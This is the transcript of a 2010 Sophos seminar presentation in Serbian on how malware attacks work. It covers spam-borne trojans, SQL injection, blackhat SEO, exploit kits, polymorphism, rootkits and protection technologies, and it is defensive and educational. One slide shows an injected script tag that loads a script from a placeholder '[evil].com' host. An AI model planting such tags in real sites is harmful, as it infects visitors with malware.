• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Anatomija napada – duhovi u mašini
 

Anatomija napada – duhovi u mašini

on

  • 1,363 views

Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.

Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.

Statistics

Views

Total Views
1,363
Views on SlideShare
1,317
Embed Views
46

Actions

Likes
0
Downloads
12
Comments
0

2 Embeds 46

http://www.itdogadjaji.com 37
http://www.slideshare.net 9

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Anatomija napada – duhovi u mašini Anatomija napada – duhovi u mašini Presentation Transcript

    • Vanja Svajcer
      Principal Researcher – Sophos
      Beograd, 13 Maj 2010
      Anatomijanapada – duhovi u mašini
    • Šta radi SophosLabs?
      Sakuplja pretnje
      Analizira i klasifikuje
      Kreira detekcije i otklanja pretnje
      Objavljuje sveže definicije i informacije
      Istraživanje i razvoj
      Nešto više informacija videćemo kasnije
      2
    • SophosLabsu samom centru
    • Anatomija napada
      Postavljanje scenarija
      Zlonamerni softver (Malware)
      Tehnike napada
      Proces analize i alati
      Tehnologija zaštite
      4
    • Tipovi malicioznog softvera
      Virus
      Trojanac
      Crv (Worm)
      5
    • Nema „standardnog“ pisca virusa, nema „standardnog“ motiva za pisanje
      Školarci
      Srednjoškolci
      Studenti
      IT profesionalci
      Uglavnom muškarci
      Nikako A/V kompanije
      Ko se nekada bavio pisanjem virusa?
    • Virusi se retko viđaju, ali čini se da opet postaju popularni
      U pitanju je novac
      U osnovi se svodi na kriminal
      ( I dalje postoji tamo neki pegavi tinejdžer…)
      Ko piše malver danas?
    • APT
      Advanced Persistent Threat
      Moderan izraz za “targeted malware”
      Mala veličina (oko 100k) i posebne namene
      Nema pakovanja
      Izgleda kao legitiman Windows fajl
      Neovlašćeni prikriveni transfer podataka (Data Exfiltration)
      Težak za uklanjanje
      10
    • 11
      Email pretnje
      Druga polovina 2008. bila je svedok dramatičnog porasta malverau obliku priloga email-a
      2009.taj trend se nastavlja,nekoliko familija se širi agresivnimmasovnim spemovanjem
      Iste stare taktike socijalnog inženjeringa
      UPS/FedEx failed deliveryreports, Microsoft patches,Airline e-tickets itd.
    • 12
      Top spemovani malver (2009)
      Dominiraju ključne familijemalvera
      Bredo
      Waled
      Jednostavnoali i dalje radi!
    • Socijalni inženjering – Bredo
      Mal/Bredo
      Ista kampanja može obuhvatati brojne “različite” priloge
    • Socijalni inženjering – Zbot (aka Zeus)
      Mal/Zbot
    • BredovsZbot
      Konkurencija između botova!!!
      Bredopokušava da onemogući bilo koji instalirani Zbot
      Vrlo slično poput NetskyvsBaglerata od pre par godina!!!
    • 16
      Email pretnje
      Globalnespem zamke za praćenje spema
      SADusmerava više spema nego bilo koja druga pojedinačna država
      Kompromitovani računari ne samo što šire spem već distribuiraju malver i lansiraju DDoS napade
    • Web najdominantniji
      99% inficiranih sistema su legitimni kompromitovani sajtovi
      Sajtovi za napad
      Botnet C&C korišćenjem HTTP
      Napadi i dalje često počinju spemovanjem email-a
      17
    • 18
    • Napadi Web 2.0 aplikacija
    • Korak1: preusmeravanje sa kompromitovanog sajta
      Kompromitovani web sajtovi
      Attacker-controlledredirects
      Attack site usingbundle of exploits
      Payload
    • Kompromitovanje hostova
      21
    • SQL injection
      DB
      DB
      DB
      Malicious SQLinjection
      Hakeri koriste alate da identifikuju stranice potencijalno ranjive na SQL injection
      Šalju maliciozneHTTP zahteve (Demo)
    • SQL injection
      <script src=http:/
      <script src=http:/
      <script src=http:/
      <script src=http:/
      <script src=http:/
      <script src=http:/
      <script src=http:/
      <script src=http://[evil].com/file.js
      SQL injection uzrokuje da baza podataka postane zabiberena malicioznim skript tagovima
      Kao rezultat, stranice na web serveru izgrađene od podataka preuzetih iz baze takođe sadrže maliciozne skript tagove
    • SQL injection
      Korisnik se kreće web sajtom
      Maliciozni skript tag prikrivenoučitava skript sa udaljenog servera
      Žrtva postaje inficirana malverom:Asproxtrojan
    • 25
      Demo SQLi + XSS
    • Novootkrivene inficirane stranice – april 2010
      26
    • Blackhat SEO
      Kompromitovani hostovi zasejani sa SEO-kitovima
      Povećavaju rangiranje stranice
      27
    • SEO trovanje
      Pretraga po popularnim rečima
    • Blackhat SEO
      29
    • Blackhat SEO
      30
    • 31
      Demo Blackhat SEO
    • Vidljivost – sajtovi koji hostuju SEO-kitove
    • Korak3: Preuzimanje sadržaja sa napadačevog sajta
      Kompromitovani web sajtovi
      Preusmeravanja kojakontroliše napadač
      Sajt za napad koristi više kombinovanih ranjivosti
      Payload
    • Web napadi
      Otkriven: 19. oktobra 2009.
      Izrađen korišćenjem kupljenih kompleta alata
      MPack, IcePack, GPack,Neosploit, Eleonore, Yes
      Konzola za upravljanje
      Phishing
      Najpogođenije države:
      Francuska – 4%
      SAD– 17%
      Velika Britanija – 3%
      Nemačka – 6%
    • Web napadi
      Pregled po programimaza pregled Internet sadržaja!
      Polimorfizam sa serverske strane
      Procenat pogođenih:
      MSIE – 12%
      FireFox – 1%
      Opera – 5%
    • Polimorfizam
      36
    • Polimorfizam
      37
    • Polimorfizam
      38
    • Polimorfizam
      39
    • Polimorfizam
      40
    • Slabosti polimorfnog malvera
      Poly-engine je deo koda
      Može biti reverzovan od strane upornog istraživača
      Mora biti dekriptovan u memoriji
      Emulira programski kod dok se ne nađe prava varijanta
      Detekcija može biti bazirana po proceduri dekripcije
      41
    • Polimorfizam sa serverske strane
      42
    • Polimorfizam sa serverske strane
      43
    • Polimorfizam sa serverske strane
      44
    • Polimorfizam sa serverske strane
      45
    • 46
      Demo SSP
    • Korak4: Napadni žrtve kroz ranjivosti, zarazi ih
      Kompromitovani web sajtovi
      Preusmeravanja kojakontroliše napadač
      Sajt za napad koristiviše kombinovanih ranjivosti
      Tovar
    • Lažni AV profesionalizam
    • 49
      Video - scareware
    • Troj/MacSwp
      50

    • Zeus (Zbot)
      Komplet za kreiranje botneta i malvera za krađu informacija
      Builder
      Loader
      Control panel
      51
    • 52
      Demo Zbot
    • Zeus (Zbot) - tracker
      53
    • 54
      Rootkitovi
      Programi koji koriste različite tehnike da sakriju svoje prisustvo na računaru
      Trojanci
      Legitimni programi?
    • Šta Rootkitovi rade?
      Listanjefajlova
      Memo.doc
      Memo.doc
      Sales.xls
      Sales.xls
      Phish.exe
      Sophos.ppt
      Listanjefajlova
      Anti-Virus
      skener
      Rootkit
      Operativni
      sistem
      Phish.exe
      Sophos.ppt
    • 56
      Demo rootkit
    • 57
      Vrhunski rootkitovi
      TDSS (TDL3)
      MS10-015 update
    • Vrhunski rootkitovi– Sinowal (Mebroot)
      InficiraMBR (poput starih boot sektor virusa)
      ModifikujeOS loader da učita maliciozni drajver
      Drajver sakriva maliciozniMBR (stealth)
      Instalira prilagođenimrežni stek
      Sadržibackdoor (enkriptovanaHTTP komunikacija)
      Tovar– ubrizgava maliciozne DLL-ove
      Pseudo-nasumično generisanje URL-ova zaupdate (dnevni)
    • Rootkitovi– Sinowal (Mebroot)
      CPU Real mode
      CPU Protected mode
      BIOS
      initialization
      MBR
      Boot loader
      Early kernel
      initialization
      Kernel
      initialization
      MBR
      Boot loader
      Early kernel
      initialization
      User process
      Endpoint
      security
      User process
      Sinowal
      dropper
      User process
      Read
      MBR
      BIOS services
      Window services
      Window services
      Hard disk
    • Sinowal geografsko širenje(Sinowal, Feb-Mar 2010)
    • 61
      Vrhunski rootkitovi budućnosti
      Rootkitovi za virtualizaciju
      Softver(Subvirt)
      Uz pomoć hardvera (Bluepill, Vitriol)
      Bootkitovi (eEye, vBootkit, Stoned)
      SMM bazirani rootkitovi
      Bios/EFI bazirani rootkitovi?
    • Rootkitovi za virtualizaciju
      Aplikacija 1
      OSg1
      OSg2
      Aplikacija 2
      VMM
      Rootkit za virtualizaciju
      OS
      Hardver
    • Rootkitovi za virtualizaciju
      OSg3
      OSg2
      OSg1
      Domen 0
      Hardver
      Rootkit za virtualizaciju – maliciozni hipervizor
    • SophosLabs™
    • Pregled
      65
      50000
    • SophosLabssistemi
    • 67
      Demo lab sistemi
    • Tehnologija zaštite
      Inspekcija sadržaja (klasično skeniranje)
      Detekcija na bazi ponašanja (HIPS)
      Reputacija
      Domen
      Fajl
      68
    • Životni ciklus familije malvera
      Prvi član porodice
      Analiza
      Detekcija
      TEST
      Objava
      Sledeći član porodica
    • Karakteristike familije
      Identične osnovne funkcionalnosti
      Nove varijante mogu imati dodatne funkcionalnosti
      Linije koda se ponovo upotrebljavaju
      Nakon rekompilacije, nova varijanta je binarno različita
      Tradicionalno skeniranje nije efikasno za proaktivnu detekciju familije
      Zahteva analizu na funkcionalnom nivou
    • Grafički prikaz aplikativnih zahteva
    • Spakovan -> Raspakovan
    • „Runtime behavioral“zaštita
      Nadopunjuje Behavioral Genotype
      Proverava ponašanje procesa primenjenona sistemu
      Proverava sve pokrenute procese na znake malicioznih modifikacija sistemskih objekata
      Fajlove
      Registry unose
      Procese
      Mrežne konekcije
      Učitane drajvere
    • Registracija urun ključu
      • Pokreće se proces virus.exe...
      • Hmmm, OK.Skeniram na viruse…
      • Ništa nije pronađeno.
      • Virus.exe otvararegistry run ključ...
      • Zanimljivo. Reci mi nešto više o tome.
      • Virus.exe se registruje u run ključ…
      • Hmmm, ne, to nije OK.Blokiraj operaciju!!!
      • Operacija blokirana.
      • Hvala ti kernele!
      • Izveštavam o ponašanju.
      Uprošćena runtime arhitektura
      Privileged – kernel mode
      Non-privileged – user mode
      Virus.exe
    • Buffer overflow zaštita
      Generičkatehnologijaza detekciju zloupotrebe propusta (uključujući tzv. zero day zloupotrebe)
      Nadopunjuje Windows DEP
      Detektuje različite buffer overflow napade
      Stack
      Heap
      Return to lib C
      Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske strane
    • Buffer overflow – uprošćena arhitektura
      • Preuzimam fajl…
      • Zanimljivo, odakle dolaziš?
      • Internet Explorer programski kod.
      • OK.
      • Preuzimam fajl2...
      • Oh, ne opet.Odakle dolaziš?
      • Stack.
      • Oh, ne. Buffer overflow detektovan!!!
      • Suspendujem proces.
      • Prijavljujem ponašanje.
      Iexplore.exe
    • Cloud computing
      77
    • Cloud zaštita
      Pretrage u realnom vremenu
      Povratne informacije u realnom vremenu (zaštita zajednice)
      Socijalno umrežavanje vezano za bezbednost
      Premošćavanje prekida u zaštiti
      Unapređenje vremena odziva
      78
    • Proaktivno vs reaktivno
      79
    • Zaključak
      Malver postaje sve kompleksniji
      Finansijska motivacija
      Usmereni (targeted) malver može predstavljati izazov
      Security zajednica ne gubi bitku
      Stalno se razvijaju nove metode
      Tehnologija ne predstavlja „srebrni metak“
      80
    • vanja.svajcer@sophos.com
      Blog: http://www.sophos.com/blogs/sophoslabs
      Twitter: http://twitter.com/sophoslabs
      Pitanja?